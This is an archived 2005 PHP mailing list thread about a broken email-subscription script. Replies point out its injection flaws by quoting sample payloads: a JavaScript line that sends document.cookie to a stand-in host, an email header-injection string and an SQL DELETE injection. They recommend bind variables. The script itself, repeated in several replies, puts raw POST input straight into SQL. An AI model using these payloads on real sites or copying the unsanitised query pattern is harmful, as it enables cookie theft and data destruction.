Re: [PHP-DB] insert (database)
Martin Norland wrote:
Jochem Maas wrote:
Yemi Obembe wrote:
the objective of the script below is to first search if a subscriber
is already in a list before subscribing his email (so as to prevent
double subscription). the select part works finebut the insert
doesnt. know why?
if ($v = strtolower($_POST['email'])) {
what happens when $_POST['email'] is equal to
'
document.location =
"http://www.evilkid.net/?stolencookie"+document.cookie;
';
or something like that? Just something to think about.
Then the malicious user gets to send their own cookies for this site to
another site of their choosing :P. I would be more worried about it
being equal to things like:
"Spam my Enemy <[EMAIL PROTECTED]>"
+ "Spam my Enemy also <[EMAIL PROTECTED]>"
+ etc.
or
"\r\nFrom: Idiots Inc. <[EMAIL PROTECTED]>"
or
"'; Delete from arbitrary_table_name where 'yes'='yes"
ah yes - that would an effective attack in/on an email ;-)
All of which are easily prevented with some attention to detail. (or in
some cases newer versions of software, which explicitly allow only one
statement per call). Finally - the concept of bind variables (or
equivalent) are your friend (as Jochem already knows with firebird iirc).
yes indeed! praise to the guy who wrote the new firebird extension :-),
savin' my ass on a daily basis :-)
Cheers,
--
PHP Database Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP-DB] insert (database)
Jochem Maas wrote:
Yemi Obembe wrote:
the objective of the script below is to first search if a subscriber
is already in a list before subscribing his email (so as to prevent
double subscription). the select part works finebut the insert
doesnt. know why?
if ($v = strtolower($_POST['email'])) {
what happens when $_POST['email'] is equal to
'
document.location = "http://www.evilkid.net/?stolencookie"+document.cookie;
';
or something like that? Just something to think about.
Then the malicious user gets to send their own cookies for this site to
another site of their choosing :P. I would be more worried about it
being equal to things like:
"Spam my Enemy <[EMAIL PROTECTED]>"
+ "Spam my Enemy also <[EMAIL PROTECTED]>"
+ etc.
or
"\r\nFrom: Idiots Inc. <[EMAIL PROTECTED]>"
or
"'; Delete from arbitrary_table_name where 'yes'='yes"
All of which are easily prevented with some attention to detail. (or in
some cases newer versions of software, which explicitly allow only one
statement per call). Finally - the concept of bind variables (or
equivalent) are your friend (as Jochem already knows with firebird iirc).
Cheers,
--
- Martin Norland, Database / Web Developer, International Outreach x3257
The opinion(s) contained within this email do not necessarily represent
those of St. Jude Children's Research Hospital.
--
PHP Database Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP-DB] insert (database)
try
if (mysql_num_rows($res)>0) {
echo "Your email: $v already in the list";
}
else {
$sql_in = "INSERT INTO arcadia ('email') VALUES ('$v')";
$result_in = mysql_query($sql_in);
echo "Your email: $v subscribed!";
}
}
else {
include("index.php");
exit;
}
bastien
From: Yemi Obembe <[EMAIL PROTECTED]>
To: php-db@lists.php.net
Subject: [PHP-DB] insert (database)
Date: Wed, 2 Feb 2005 01:23:16 -0800 (PST)
the objective of the script below is to first search if a subscriber is
already in a list before subscribing his email (so as to prevent double
subscription). the select part works finebut the insert doesnt. know
why?
if ($v = strtolower($_POST['email'])) {
$db = mysql_connect(mysql, "usser", "pw");
$con = mysql_select_db("ng",$db);
$sql = "SELECT * FROM mytable WHERE email='$v'";
$res = mysql_query( $sql ) ;
if ($row = mysql_fetch_array($res)) {
echo "Your email: $v already in the list";
}
else {
$sql_in = "INSERT INTO arcadia ('email') VALUES ('$v')";
$result_in = mysql_query($sql_in);
echo "Your email: $v subscribed!";
}
}
else {
include("index.php");
exit;
}
-
A passion till tomorrow,
Opeyemi Obembe | ng.clawz.com
-
Do you Yahoo!?
Yahoo! Search presents - Jib Jab's 'Second Term'
--
PHP Database Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP-DB] insert (database)
Yemi Obembe wrote:
the objective of the script below is to first search if a subscriber is already in a list before subscribing his email (so as to prevent double subscription). the select part works finebut the insert doesnt. know why?
if ($v = strtolower($_POST['email'])) {
what happens when $_POST['email'] is equal to
'
document.location = "http://www.evilkid.net/?stolencookie"+document.cookie;
';
or something like that? Just something to think about.
$db = mysql_connect(mysql, "usser", "pw");
$con = mysql_select_db("ng",$db);
$sql = "SELECT * FROM mytable WHERE email='$v'";
$res = mysql_query( $sql ) ;
if ($row = mysql_fetch_array($res)) {
echo "Your email: $v already in the list";
}
else {
$sql_in = "INSERT INTO arcadia ('email') VALUES ('$v')";
$result_in = mysql_query($sql_in);
echo "Your email: $v subscribed!";
you use different table names in each query. is that the intention?
}
}
else {
include("index.php");
exit;
}
-
A passion till tomorrow,
Opeyemi Obembe | ng.clawz.com
-
Do you Yahoo!?
Yahoo! Search presents - Jib Jab's 'Second Term'
--
PHP Database Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
[PHP-DB] insert (database)
the objective of the script below is to first search if a subscriber is already
in a list before subscribing his email (so as to prevent double subscription).
the select part works finebut the insert doesnt. know why?
if ($v = strtolower($_POST['email'])) {
$db = mysql_connect(mysql, "usser", "pw");
$con = mysql_select_db("ng",$db);
$sql = "SELECT * FROM mytable WHERE email='$v'";
$res = mysql_query( $sql ) ;
if ($row = mysql_fetch_array($res)) {
echo "Your email: $v already in the list";
}
else {
$sql_in = "INSERT INTO arcadia ('email') VALUES ('$v')";
$result_in = mysql_query($sql_in);
echo "Your email: $v subscribed!";
}
}
else {
include("index.php");
exit;
}
-
A passion till tomorrow,
Opeyemi Obembe | ng.clawz.com
-
Do you Yahoo!?
Yahoo! Search presents - Jib Jab's 'Second Term'
